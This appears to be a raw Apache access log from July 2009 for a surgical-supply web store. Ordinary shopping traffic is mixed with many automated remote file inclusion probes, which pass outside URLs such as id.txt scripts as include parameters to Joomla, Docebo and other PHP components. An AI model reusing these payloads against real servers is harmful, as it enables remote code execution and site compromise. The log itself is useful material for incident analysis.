99.37.28.105 - - [28/Jul/2009:01:09:39 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD HTTP/1.1" 200 59206 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:41 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:41 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:41 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:41 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:41 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:42 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:42 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:42 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:42 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:42 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:42 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:42 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:42 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:43 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:43 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:43 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:43 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:43 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:43 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:43 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:43 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:44 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:44 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:44 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:44 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:44 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:44 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:09:44 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.234.7.92 - - [28/Jul/2009:01:09:57 -0400] "GET /send_reminders.php?includedir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:01:09:57 -0400] "GET /logs/send_reminders.php?includedir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:01:09:57 -0400] "GET /send_reminders.php?includedir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:01:09:57 -0400] "GET /logs/send_reminders.php?includedir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:01:09:57 -0400] "GET /logs/access_log.Q109060600/send_reminders.php?includedir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:01:09:57 -0400] "GET /logs/access_log.Q109060600/send_reminders.php?includedir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:01:10:06 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:01:10:06 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:01:10:06 -0400] "GET /logs/access_log.Q109061800%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:01:10:06 -0400] "GET /logs/access_log.Q109051600%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:01:10:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.234.7.92 - - [28/Jul/2009:01:10:19 -0400] "GET /logs/access_log.Q109070300%20%20/send_reminders.php?includedir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:01:10:21 -0400] "GET /logs/access_log.Q109070300%20%20/send_reminders.php?includedir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
99.37.28.105 - - [28/Jul/2009:01:10:38 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L011B87460575F900EB9206Q+M37+ENG HTTP/1.1" 200 38020 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):GOLD" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:10:45 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L011B884E0075290011D206Q+M37+ENG HTTP/1.1" 200 76292 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L011B87460575F900EB9206Q+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:10:46 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L011B884E0075290011D206Q+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:10:46 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L011B884E0075290011D206Q+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
99.37.28.105 - - [28/Jul/2009:01:10:46 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L011B884E0075290011D206Q+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.234.7.92 - - [28/Jul/2009:01:10:46 -0400] "GET /logs/access_log.Q109070300/send_reminders.php?includedir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:01:10:47 -0400] "GET /logs/access_log.Q109070300/send_reminders.php?includedir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
99.37.28.105 - - [28/Jul/2009:01:11:01 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L011B884E0075290011D206Q+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
74.6.22.169 - - [28/Jul/2009:01:11:10 -0400] "GET /logs/access_log.Q109051100 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
98.223.10.64 - - [28/Jul/2009:01:11:30 -0400] "GET /index.php?meio=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
98.223.10.64 - - [28/Jul/2009:01:12:01 -0400] "GET /logs/index.php?meio=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
98.223.10.64 - - [28/Jul/2009:01:12:01 -0400] "GET /logs/access_log.Q109062300/index.php?meio=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.220.213.203 - - [28/Jul/2009:01:13:15 -0400] "GET /logs/access_log.Q109051600/?_kb_path=http://manageaproject.com/custom-tailor/2007/06/07/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.220.213.203 - - [28/Jul/2009:01:13:15 -0400] "GET /?_kb_path=http://manageaproject.com/custom-tailor/2007/06/07/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
210.220.213.203 - - [28/Jul/2009:01:13:15 -0400] "GET /logs/?_kb_path=http://manageaproject.com/custom-tailor/2007/06/07/id1.txt? HTTP/1.1" 200 11334 "-" "Mozilla/5.0"
210.220.213.203 - - [28/Jul/2009:01:13:26 -0400] "GET /logs/access_log.Q109051700/?_kb_path=http://manageaproject.com/custom-tailor/2007/06/07/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
98.223.10.64 - - [28/Jul/2009:01:13:37 -0400] "GET /logs/access_log.Q109062300%20%20/index.php?meio=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:01:14:29 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:01:14:29 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:14:30 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:14:30 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:14:30 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:01:14:30 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:01:14:44 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
207.58.140.78 - - [28/Jul/2009:01:14:44 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
94.23.205.32 - - [28/Jul/2009:01:14:44 -0400] "GET /logs/access_log.Q109060100/index.php?_REQUEST=&_REQUEST[option]=option,com_jpack&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:01:14:44 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_jpack&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:01:14:44 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_jpack&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:01:14:44 -0400] "GET /logs/access_log.Q109051300/index.php?_REQUEST=&_REQUEST[option]=option,com_jpack&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
202.125.45.45 - - [28/Jul/2009:01:14:54 -0400] "GET /logs/access_log.Q109052000/index.php?_REQUEST=&_REQUEST[option]=option,com_letterman&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:01:14:54 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_letterman&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:01:14:54 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_letterman&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
202.125.45.45 - - [28/Jul/2009:01:14:54 -0400] "GET /logs/error_log.Q109051900/index.php?_REQUEST=&_REQUEST[option]=option,com_letterman&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
209.59.12.99 - - [28/Jul/2009:01:15:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.205.32 - - [28/Jul/2009:01:16:05 -0400] "GET /logs/access_log.Q109052900/index.php?_REQUEST=&_REQUEST[option]=option,com_registration&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:01:16:05 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_registration&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:01:16:05 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_registration&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:01:16:28 -0400] "GET /logs/access_log.Q109062300/index.php?_REQUEST=&_REQUEST[option]=option,com_registration&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:01:16:57 -0400] "GET /logs/access_log.Q109052900/index.php?_REQUEST=&_REQUEST[option]=option,com_sef&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:01:16:57 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_sef&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:01:16:57 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_sef&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
94.23.205.32 - - [28/Jul/2009:01:17:27 -0400] "GET /logs/access_log.Q109071900/index.php?_REQUEST=&_REQUEST[option]=option,com_sef&_REQUEST[Itemid]=10&GLOBALS=&mosConfig_absolute_path=http://www.energy-serv.ro/mambots/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
